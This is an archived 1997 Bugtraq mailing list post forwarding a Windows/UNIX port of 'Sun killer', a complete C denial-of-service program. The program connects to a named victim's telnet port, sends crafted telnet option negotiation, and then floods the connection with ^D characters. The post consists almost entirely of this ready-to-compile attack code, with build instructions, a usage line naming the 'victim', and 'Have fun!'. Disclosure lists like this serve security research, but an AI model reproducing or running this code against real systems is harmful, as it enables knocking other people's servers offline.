Bugtraq mailing list archives

Sun killer - NT port

From: aleph1 () DFW NET (Aleph One)
Date: Sun, 14 Dec 1997 13:01:49 -0600

From an anonymous contributor. Should compile under UNIX as well.

---------- Forwarded message ----------
/*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

#ifdef WIN32

#include <winsock.h>
#include <stdio.h>
/*NT doesn't have <arpa/telnet.h>
* so swipe the BSD header and stick it in your
* working dir*/
#include "telnet.h"

#else
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <unistd.h>
#endif

#define BUFSIZE 100
#define DOTS

void catchit(void)
{
    printf("\nCaught SIGPIPE -- your link may be too slow.\n");
    exit(1);
}

#ifdef WIN32
void InitWinsock(void)
{
        WORD          VersionRequested;
        WSADATA       WsaData;

        VersionRequested = MAKEWORD(1, 1);
    if(WSAStartup(VersionRequested, &WsaData) != 0)
        {
                printf("Could not initialize Winsock\n");
                exit(-1);
        }
}
#endif

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

#ifndef WIN32
        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);
#else
                InitWinsock();
#endif

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        memset(&sin, 0, sizeof(sin));
        memcpy((char *)&sin.sin_addr, hp->h_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n", argv[1]);
        send(s, kludge_telopt, 21, 0);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (send(s, nastybuf, BUFSIZE, 0) != -1) {

    #ifdef DOTS
            putchar('.');
    #endif
        }
                return 0;
    }

Current thread:

To kill a sun: Jason Zapman II (Dec 13)
- SunOS4.1.4 another tmpfs bug YAMAMORI Takenori (Dec 12)
- Re: To kill a sun: David LeBlanc (Dec 13)
- Re: To kill a sun: James Lockwood (Dec 14)
- Vulnerabilities in ICQ Alan Cox (Dec 14)
  - Re: Vulnerabilities in ICQ Seth McGann (Dec 14)
    - Re: Vulnerabilities in ICQ Solar Designer (Dec 16)
  - Re: Vulnerabilities in ICQ Arik Vardi (Dec 15)
- Sun killer - NT port Aleph One (Dec 14)
- Re: To kill a sun: Craig Johnston (Dec 14)
- <Possible follow-ups>
- Re: To kill a sun: Robert Sink (Dec 14)
  - Re: To kill a sun: Darren Reed (Dec 14)
  - Re: To kill a sun: Paul Nash (Dec 15)